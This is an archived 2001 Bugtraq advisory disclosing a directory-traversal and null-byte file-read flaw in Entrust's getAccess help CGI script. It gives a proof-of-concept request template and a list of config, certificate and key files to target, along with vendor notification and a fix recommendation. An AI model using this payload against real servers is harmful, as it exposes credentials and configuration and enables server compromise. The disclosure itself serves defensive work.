[23067] in bugtraq
New getAccess[tm] Vulnerability
daemon@ATHENA.MIT.EDU (rudi carell)
Mon Nov 5 12:59:50 2001
From: "rudi carell" <rudicarell@hotmail.com>
To: BUGTRAQ@securityfocus.com
Date: Mon, 05 Nov 2001 14:17:14
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F65uYimh6bXScLm7ugV0001c45f@hotmail.com>
Good Morning Listmembers,
this is another posting(see 1st here http://www.securityfocus.com/bid/3109)
about Entrust s "getAccess[tm]" product
Problem Description:
"getAccess[tm]" (still) uses default shellscripts which start java-classes
for their web-applications.
due to missing input-validation it is possible to read files with getAccess
s permissions on the "getaccess"-machine. (only works in combination with
other input fields as described below)
in connection with config- and other files this can lead to a
total server-compromise(dont ask me how:-).
POC-Example:
a HTTP-request to:
http://getAccessHostname/sek-bin/helpwin.gas.bat?
with the following parameters:
mode=
&draw=x
&file=x
&module=
&locale= [relative FILE/PATH] [Nullbyte/0x00] [Backslash/0x5c]
&chapter=
... will lead to disclosure of [FILE/PATH]
Config-Filelist(depends heavily on config .. and can be found 2 trav s back
[../../]):
/config/acl-runtime.conf
/config/administration.conf
/config/applist.conf
/config/authmethod.conf
/config/clientCert.conf
/config/connection.conf
/config/directories.conf
/config/domainAuth.conf
/config/hook.conf
/config/license.conf
/config/log.conf
/config/login.conf
/config/misc.conf
/config/pmda.conf
/config/redirection.conf
/config/registry.conf
/config/serverCert.conf
/config/serverConnection.conf
/config/source_systems.conf
/config/version.conf
/config/serverReq.pem
/config/serverCert.pem
/config/certs
Summary:
object: (helpwin.gas.bat cgi-shell-scripts)
class: Reffering to OWASP-IV (Input Validation Classes)
Directory Traversal (IV-DT-1)
http://www.owasp.org/projects/cov/owasp-iv-dt-1.htm
Null Character (IV-NC-1)
http://www.owasp.org/projects/cov/owasp-iv-nc-1.htm
Meta Character (IV-MC-1)
http://www.owasp.org/projects/cov/owasp-iv-mc-1.htm
remote: yes
local: ---
vendor: hast been informed with seperate e-mail
(security@entrust.com/entrust@entrust.com)
patch/fix: is already availiable and will be posted by entrust here today.
recomannded fix: sanitize meta-characters from user-input
personal remark: using shell-scripts for security-related software has
always been dangerous!!!
nice day,
rC
security@freefly.com
rudicarell@hotmail.com
http://www.freefly.com/security/
check out the brandnew Open Web Application Security project
http://www.owasp.org
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
